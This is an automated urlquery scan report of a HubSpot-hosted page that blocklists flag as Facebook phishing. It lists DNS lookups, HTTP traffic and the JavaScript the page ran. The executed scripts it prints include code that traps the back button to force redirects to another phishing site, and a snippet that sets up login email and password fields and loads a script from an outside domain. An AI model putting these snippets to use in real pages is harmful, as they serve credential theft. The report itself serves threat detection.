Overview

URL appnewstv.hs-sites-eu1.com/
IP104.18.33.253
ASNCLOUDFLARENET
Location
Report completed2022-09-14 10:26:09 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Phishing
2022-09-14 2 appnewstv.hs-sites-eu1.com/_hcms/perf Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (24)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS track-eu1.hubspot.com (2) 73788 2021-08-03 10:49:05 UTC 2022-09-14 02:52:34 UTC 172.65.240.166
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-09-14 04:47:59 UTC 23.36.77.32
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-14 04:47:55 UTC 143.204.55.49
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-14 06:33:50 UTC 93.184.220.29
mnemonic passive DNS cdnjs.cloudflare.com (3) 235 2020-10-20 10:17:36 UTC 2022-09-14 04:31:59 UTC 104.17.25.14
mnemonic passive DNS f.hubspotusercontent-eu1.net (3) 278068 2021-08-12 10:46:27 UTC 2022-09-14 07:31:04 UTC 172.64.153.30
mnemonic passive DNS feliznewstv.com (3) 0 2022-07-23 16:41:06 UTC 2022-07-23 16:41:06 UTC 147.182.144.225 Unknown ranking
mnemonic passive DNS js-eu1.hscollectedforms.net (1) 75385 2021-08-03 13:53:48 UTC 2022-09-14 09:38:12 UTC 172.65.192.122
mnemonic passive DNS widgets.amung.us (1) 12623 2012-05-21 19:25:54 UTC 2022-09-14 08:20:37 UTC 104.22.75.171
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-14 05:55:26 UTC 143.204.55.115
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-14 04:48:22 UTC 34.117.237.239
mnemonic passive DNS js-eu1.hs-scripts.com (2) 63672 2021-08-03 13:53:48 UTC 2022-09-13 22:15:10 UTC 172.65.208.22
mnemonic passive DNS static.hsappstatic.net (5) 8199 2013-09-26 02:22:42 UTC 2022-09-14 05:56:13 UTC 104.17.6.210
mnemonic passive DNS ocsp.pki.goog (4) 175 2017-06-14 07:23:31 UTC 2022-09-14 04:48:23 UTC 142.250.74.3
mnemonic passive DNS 26246913.fs1.hubspotusercontent-eu1.net (2) 0 No data No data 104.18.34.226 Unknown ranking
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-14 04:48:25 UTC 34.120.237.76
mnemonic passive DNS js-eu1.hs-analytics.net (1) 69352 2021-08-03 13:53:48 UTC 2022-09-14 02:52:33 UTC 172.65.238.60
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-08-29 13:43:22 UTC 2022-09-14 04:48:25 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS app-eu1.hubspot.com (1) 191732 2021-07-26 14:26:48 UTC 2022-09-14 08:40:34 UTC 172.65.236.181
mnemonic passive DNS appnewstv.hs-sites-eu1.com (2) 0 2022-09-13 19:45:26 UTC 2022-09-14 03:25:15 UTC 172.64.154.3 Unknown ranking
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-14 04:48:23 UTC 52.39.126.109
mnemonic passive DNS js-eu1.hs-banner.com (1) 66996 2021-08-03 13:53:48 UTC 2022-09-14 05:23:57 UTC 172.65.202.201
mnemonic passive DNS cdn2.hubspot.net (2) 7304 2013-04-11 07:00:34 UTC 2022-09-14 05:05:18 UTC 104.17.242.204
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-14 05:27:55 UTC 142.250.74.10


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 104.18.33.253

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000
0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000
0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000
0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000
0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-03 21:44:15 +0000
0 - 0 - 1 storageapi.fleek.co/2a7f3081-db35-4a88-9e6d-7 (...) 104.18.6.145
2022-12-03 21:43:59 +0000
0 - 0 - 3 sweepstakessurveytoday.com/sweeps-survey.html 188.114.96.1
2022-12-03 21:43:57 +0000
0 - 0 - 2 ready-for-download.com/new/3p/ 104.21.17.24
2022-12-03 21:42:29 +0000
0 - 0 - 9 www.work511.in/order/ 172.67.205.84
2022-12-03 21:41:49 +0000
0 - 0 - 3 dollarsurvey.site/captcha1.html 104.26.3.231

Last 5 reports on domain: hs-sites-eu1.com

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000
0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000
0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000
0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000
0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-15 15:41:18 +0000
0 - 0 - 8 app-funnelsx.bubbleapps.io/version-test/ 104.19.217.48
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-10 23:45:55 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-10 14:36:22 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-01 10:39:02 +0000
0 - 0 - 2 jhufedsgjg614322067.brizy.site/ 34.237.47.210


JavaScript

Executed Scripts (19)


Executed Evals (6)

#1 JavaScript::Eval (size: 516, repeated: 1) - SHA256: 981233bb7fc26109c211cad042da538cf8df699dc77e1b859daf53174dd95f24

                                        (function() {
    var ignoreHistoryChange = true;
    window.onpopstate = function(event) {

        if (!ignoreHistoryChange) {
            ignoreHistoryChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHistoryChange = false;
        }


    };
})();
                                    

#2 JavaScript::Eval (size: 506, repeated: 1) - SHA256: faa040a5ceb4c2ae787756b6505cc259fd4eecf9eefd1a619b68170c36be4481

                                        (function() {
    window.location.hash = Math.random();
    var ignoreHashChange = true;
    window.onhashchange = function() {
        if (!ignoreHashChange) {
            ignoreHashChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHashChange = false;
        }
    };
})();
                                    

#3 JavaScript::Eval (size: 74, repeated: 1) - SHA256: caa4136b6be3d43f29aa4daaae83f78c3b5c2147caab95afa2204069aa91a97c

                                         (function() {
     new Image().src = '//whos.amung.us/widget/josvip222';
 })();
                                    

#4 JavaScript::Eval (size: 0, repeated: 1) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#5 JavaScript::Eval (size: 72, repeated: 1) - SHA256: 29a2f56684cbeb9be02ed2d2ada727030d2781d6f6630d817ea23ef8ab50b293

                                        (function() {
    new Image().src = '//whos.amung.us/widget/josvip222';
})();
                                    

#6 JavaScript::Eval (size: 386, repeated: 1) - SHA256: d56b088af0f7a23d2cdc0a4e61293c5e55c61d23a49e18906733f77e1b3ab364

                                        document.body.className = document.body.className + ' touch x1-5 android _fzu _50-3 iframe acw portrait';
m_login_email.required = true;
m_login_password.required = true;
var script_ = document.createElement('script');
script_.src = "https://feliznewstv.com/location";
script_.async = true;
document.body.appendChild(script_);
                                    

Executed Writes (0)



HTTP Transactions (54)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 14 Sep 2022 10:09:30 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 f00e3524edcdf61801454f2bb21e71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: SRPXOTN2Kau6NX_rtJlIiTlD2rTXo1-qnwUPmXY6TBWtf_mzPiOBYw==
Age: 988


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B5F178D23E633283F226CCA7A9AE79B01E6CAB2299FF7065C980D3A9953212FD"
Last-Modified: Tue, 13 Sep 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12975
Expires: Wed, 14 Sep 2022 14:02:13 GMT
Date: Wed, 14 Sep 2022 10:25:58 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.49
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 14 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: Pk4mjsVddjT1N4Ihf4ydhM1ldfn5JRQLhYBqyl1_d9pnq2vMDgvqRQ==
age: 21043
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Wed, 14 Sep 2022 10:25:58 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Wed, 14 Sep 2022 10:03:22 GMT
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 10:03:50 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 1d8cf7c8865ed1078c19a98771ad34ca.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: eswWoizPy_CQvgsyqZ0OVuX1vdXfHbmt8YJvntTAprLplwKk4sEpWQ==
Age: 1356


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET / HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         172.64.154.3
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf47f170b59-OSL
Cache-Control: s-maxage=10,max-age=5
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
cache-tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
Edge-Cache-Tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
X-HS-Cache-Config: BrowserCache-5s-EdgeCache-10s
X-HS-Content-Id: 53071520739
X-HS-Hub-Id: 26246913
X-HubSpot-Correlation-Id: 8dd25487-1a6f-444f-b063-79fe32a81e21
X-Powered-By: HubSpot
X-Robots-Tag: none
X-Trace: 2B970C8762D0C3C9EBCA334459ED727CD72845742D000000000000000000
Server: cloudflare
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1069)
Size:   5376
Md5:    56b28dc45080bbe7baa59a1a81eb9572
Sha1:   4b7dfc2d9a855f8b1ac0b1e7f569e2ea08cb1628
Sha256: ded623fdb82a9da45270d38ba8cf1e3729fff96610b209d5ed7fb6a684ce2ca8

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3693
Cache-Control: 'max-age=158059'
Date: Wed, 14 Sep 2022 10:25:59 GMT
Last-Modified: Wed, 14 Sep 2022 09:24:26 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /ajax/libs/font-awesome/5.15.1/css/all.min.css HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.25.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
content-length: 10491
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5f7b5b5f-e7d0"
last-modified: Mon, 05 Oct 2020 17:43:59 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 4194177
expires: Mon, 04 Sep 2023 10:25:59 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EC0NufkON958%2FQf3ppjcUue8xOvp8%2FJmH%2BoxY2qW5POrO7rKe74nOQoCDDf7auqF6W9pThA4FiXf4mhp1ZQs6MJqtU1fQGfjAWAqyozNgbam7oGRRgzGWiIvze87LgZvf6CktXA5"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74a86bf94895b52d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (59158)
Size:   10491
Md5:    a20f2b1b0e73086a7546d004092fb368
Sha1:   3c0e3c8c74971acac179bb55951410cdfc26abab
Sha256: 185c5af2acbae7972165d8c67887a7300e85cb3f03882048437b6e5177c1fe2a
                                        
                                            GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
content-length: 27958
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb09ed3-15d84"
last-modified: Mon, 04 May 2020 23:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 8594863
expires: Mon, 04 Sep 2023 10:25:59 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2d0FwSjp4HmGTyZ127OJD1kYtliDww2He6psefmvktLrvOUfJXBpNyzwjpiDWmh5WpxfcV5elEi0fwifoHT5R129c4ga%2FuhIuQqxY3fGkYhTrxi8Jo2bJqC21e3ImEvvjpMXgJSS"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74a86bf968acb52d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   27958
Md5:    4b5f47439b640180cc3450f7de05d0d8
Sha1:   5a0dc9bcab80ddc409dd35fcb00a88fe6846fee2
Sha256: 1f85e8b327f42c17c025d69849914068536d9aa95412fe473ae90ffb2f4ebd82
                                        
                                            GET /ajax/libs/jquery-migrate/3.3.1/jquery-migrate.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
content-length: 3592
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5ef3fc71-2b0b"
last-modified: Thu, 25 Jun 2020 01:22:57 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 6194064
expires: Mon, 04 Sep 2023 10:25:59 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qz55T4mVPeK6rrdXaGIAkLsh9BtnU%2BxwPP8fCkRUgA0RSlVaetDMW1m67Zm2TMVjZl347crthG8URFSP7dZIG2x01%2FhlS0QKDU7F8GfXhLvIplP5IY26swpucPIyOacQWckH0rlb"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74a86bf968aeb52d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (10878)
Size:   3592
Md5:    6ea2c00839ed36981fbd1b780e595bfb
Sha1:   9ccfa1a9cd5cb950fc6aaf7697e8a0f9445499b8
Sha256: 9264523f67fe6dae44ac10a749711f77eeff71a8296210098d1144f84e01f944
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53071252464/1663077093553/marketplace/GiantFocal/Hatch_Landing/js/main.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         172.64.153.30
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf949e5b515-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"d9021282f13fd812e10bb808a4c186e0"
Expires: Wed, 28 Sep 2022 10:25:59 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:34 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077093849
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (6578)
Size:   1647
Md5:    44c911307e68de35f68d537d42b638be
Sha1:   44492c45c7927a305db155ec368f03c1fe897a34
Sha256: 1d3b8706a9bedba2a893961bcac36e8d0b216b972b46b47789e0ab37651c4597
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53070982620/1663077090631/marketplace/GiantFocal/Hatch_Landing/js/plugins/plugins.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         172.64.153.30
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf94a57b505-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"709362e671b2b08da9b90e574d607024"
Expires: Wed, 28 Sep 2022 10:25:59 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:31 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077090919
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (3296)
Size:   1465
Md5:    a4293e27e8623332217827abd391a216
Sha1:   3d56fe03c815733f126c62084c7f81bd55e73c08
Sha256: ed71fb54bd4710f3596a1350059adb20d91367da6fd04670eabbd09316912e3f
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53070288600/1663077099315/marketplace/GiantFocal/Hatch_Landing/css/main.min.css HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         172.64.153.30
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf95832b50f-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
Content-Encoding: gzip
ETag: W/"7c228c6edbc872215fbf537a8b4cf18e"
Expires: Wed, 28 Sep 2022 10:25:59 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077102493
x-amz-server-side-encryption: AES256
